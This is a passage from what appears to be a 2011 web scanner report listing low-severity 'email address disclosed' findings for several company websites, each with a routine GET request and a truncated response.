HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 87252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<a href="mailto:Infochange@freemanco.com" target="_blank">Infochange@freemanco.com</a>
...[SNIP]...

24.49. http://www.itasoftware.com/news-events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itasoftware.com
Path:   /news-events/

Issue detail

The following email address was disclosed in the response:

Request

GET /news-events/ HTTP/1.1
Host: www.itasoftware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.3.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:55:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 11811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<a href="mailto:cara@itasoftware.com">cara@itasoftware.com</a>
...[SNIP]...

24.50. http://www.itasoftware.com/scripts/hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itasoftware.com
Path:   /scripts/hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/hoverIntent.js HTTP/1.1
Host: www.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://www.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:55:39 GMT
Server: Apache
Last-Modified: Fri, 02 Apr 2010 13:50:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Wed, 15 Apr 2020 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.51. http://www.itasoftware.com/scripts/jquery.mousewheel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itasoftware.com
Path:   /scripts/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery.mousewheel.js HTTP/1.1
Host: www.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://www.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:55:39 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 17:05:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Wed, 15 Apr 2020 20:00:00 GMT
Content-Type: application/x-javascript
Content-Length: 2496

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks t
...[SNIP]...

24.52. http://www.magellangps.com/lp/eXploristfamily/css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /lp/eXploristfamily/css/styles.css

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lp/eXploristfamily/css/styles.css HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/lp/eXploristfamily/screens.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.1.10.1303853977

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:38 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Disposition: inline;filename="styles.css"
NS_RTIMER_COMPOSITE: -1241495335:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 13045

@charset "utf-8";
/*
Magellan eXplorist CSS
Title: Default CSS
Author: Pasquale Scerbo (pasquale@waveactive.com || pasquale@leftlanecreative.com)
Date: March 2010
*/


/*----------------- CSS NORMALIZER -----------------*/
/*
- cancels default styles applied to page elements
- adjusts default elements between browsers to same baseline
...[SNIP]...

24.53. http://www.magellangps.com/lp/eXploristfamily/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /lp/eXploristfamily/js/main.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lp/eXploristfamily/js/main.js HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/lp/eXploristfamily/screens.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.1.10.1303853977

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:39 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Disposition: inline;filename="main.js"
NS_RTIMER_COMPOSITE: -353693915:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 3242

/*
Magellan eXplorist JavaScript File
*/

/*
Author: Pasquale Scerbo (pasquale@waveactive.com || pasquale@leftlanecreative.com)
March 2010
*/

/*
Must be used with jQuery Library
*/

$(document).ready(function(){


/********************************************/
//        jQuery Tooltip (Screen Three)
/*****************
...[SNIP]...

24.54. http://www.magellangps.com/site/js/general-scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /site/js/general-scripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /site/js/general-scripts.js HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.1.10.1303853977

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:27 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Disposition: inline;filename="general-scripts.js"
NS_RTIMER_COMPOSITE: 348391173:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 7430

/*
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @pa
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.55. http://www.moxiesoft.com/tal_about/aboutus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/aboutus.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/aboutus.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.6.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:08:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.56. http://www.moxiesoft.com/tal_about/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/contact.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/contact.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_about/aboutus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.7.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.57. http://www.moxiesoft.com/tal_news/events-resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/events-resources.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_news/events-resources.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.6.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25479


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.58. http://www.moxiesoft.com/tal_products/employee-spaces.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/employee-spaces.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/employee-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/knowledgebase.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.59. http://www.moxiesoft.com/tal_products/kbdemo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/kbdemo/

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/kbdemo/ HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/knowledgebase.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.4.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:06:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17525


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.60. http://www.moxiesoft.com/tal_products/kbdemo/moxie_v2.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/kbdemo/moxie_v2.swf

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/kbdemo/moxie_v2.swf HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/kbdemo/media_player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.5.10.1303851424

Response

HTTP/1.1 200 OK
Content-Length: 8663510
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 15 Sep 2010 22:35:10 GMT
Accept-Ranges: bytes
ETag: "a2688e412655cb1:318f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 21:10:44 GMT

FWS    .1.....X.......r.D.....C......
jN.?......?...onEnterFrame.getBytesLoaded.getBytesTotal.preloader_mc.value..............j.O................R...............R..................O..........I........
...[SNIP]...
..............j.f...5.\......hg-L..........+~F..ge....pa(.....-As..'p..E.LN..8...{...'.s.!......._...e6.+}..Yh........&W]ke....X-&Kb8.E18.-e."...]..2-*....7...@.(............kO.0.......sQY.....d..I...dZ@8f7.gD...........%..@...%.
......=^.T..[YU.."...,\"'*ZZ.[V... wR..SS#jbW.K.*M...Gd.......Y..f.9.2.9>
...[SNIP]...

24.61. http://www.moxiesoft.com/tal_products/knowledgebase.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/knowledgebase.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.3.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.62. http://www.moxiesoft.com/tal_products/products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/products.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/products.aspx HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/kbdemo/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.5.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.63. http://www.moxiesoft.com/tal_products/spaces-assets/colorbox/jquery.colorbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/spaces-assets/colorbox/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/spaces-assets/colorbox/jquery.colorbox.js HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/employee-spaces.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wr0m3unymc3ai445usuyu43k; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; TalismaCookie=unknown.direct_entry.04/26/2011; __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Content-Length: 23487
Content-Type: application/x-javascript
Last-Modified: Wed, 15 Sep 2010 18:15:17 GMT
Accept-Ranges: bytes
ETag: "aa86fef2155cb1:318f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:57:15 GMT

// ColorBox v1.3.6 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php

(function ($) {
   // Shortcuts (to increase compression)
   var colorbox = 'colorbox',
   hover = 'hover',
   TRU
...[SNIP]...

24.64. http://www.randomhouse.com/about/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /about/contact.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact.html HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
